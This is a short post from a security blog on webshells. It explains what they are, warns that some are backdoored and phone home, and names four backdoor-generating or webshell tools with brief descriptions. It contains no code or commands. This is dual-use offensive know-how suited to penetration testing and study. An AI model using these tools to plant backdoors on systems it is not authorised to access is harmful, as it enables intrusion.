Skip to content

NXNJZ

Linux and Security

  • BLOG
  • Cowsay Fortune
  • Contact
  • Gitlab

WebShells

Posted on June 20, 2018 - August 20, 2018 by nxnjz

Basics

If you don’t understand what a shell is, click here.

A webshell is usually a web page that allows the user Operating System control, usually via a command line.

Many webshells also provide a graphical interface for ease of use.

You should only use a webshell when more conventional access, like SSH or the almost obsolete Telnet, is not available.

Some may work better than others, some may not work at all depending on the security measures employed by the target.

Watch out for webshells that are backdoored. While webshells are usually considered backdoors themselves, many of them will “phone home”, letting someone (whoever put the backdoor in place, usually the developer) know that they have been executed. That person may then use the backdoor themself for nefarious purposes.  So make sure you look at the code before using a webshell, or look at HTTP traffic generated upon execution of the file. The latter will not necessarily show the existence of the backdoor in your shell. The files listed below are from reputable sources only, so you may trust them.

 

WebShells

 

    • Laudanum at github: A collection of webshells in different languages.
    • Antak PowerShell Aspx: Simple and works very well.
    • WeBaCoo: Perl script for generating php backdoors, also allows to connect to a backdoor from your terminal for terminal-like access.
    • Weevely:  Powerful python script for generating backdoors, connecting to them, and running different modules to help with many tasks.

 

 

Posted in Web-ShellsTagged asp, aspx, backdoor, php, shell, web, webshells

Post navigation

Wifi

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recent Posts

  • How to Set Up an Interactive SSH Honeypot on CentOS 8.
  • HackTheBox.eu Jarvis Writeup
  • How to setup a simple proxy server with tinyproxy (Debian 10 Buster)
  • How to Install qdPM 9.1 on Debian 10 LEMP
  • How to Install qdPM 9.1 on CentOS 7.

Tags

802.11 apache asp aspx backdoor capture the flag centos crm ctf debian exploits fingerprinting getcap hashes ifconfig information gathering iw iwconfig linux mariadb md5 nginx nmap password pastebin php practice privatebin privesc project management recon reconnoitre scanning shell sqli ssh txpower ubuntu wallabag web webshells wifi wireless xml xxe

Categories

  • BASH (1)
  • CTF/Labs (2)
  • Information Gathering (1)
  • Linux (25)
  • Password Cracking (1)
  • Privilege Escalation (2)
  • SQL Injection (1)
  • Web-Shells (1)
  • Wifi (2)
  • XXE (1)

Recent Comments

  • Audio streaming ampache ubuntu 18.04 – Education Networking on Installing Ampache on Ubuntu 18.04.
  • Creating your own Postmill installation with Ubuntu 19.10 – Digital 52 on How to Install Postmill on Ubuntu 18.04 LTS with Apache or Nginx
  • Zer00CooL on How to Install PrivateBin on Debian 9.
  • nxnjz on How to Install SuiteCRM on Debian 10 Buster
  • matt ferraro on Installing Ampache on CentOS 7.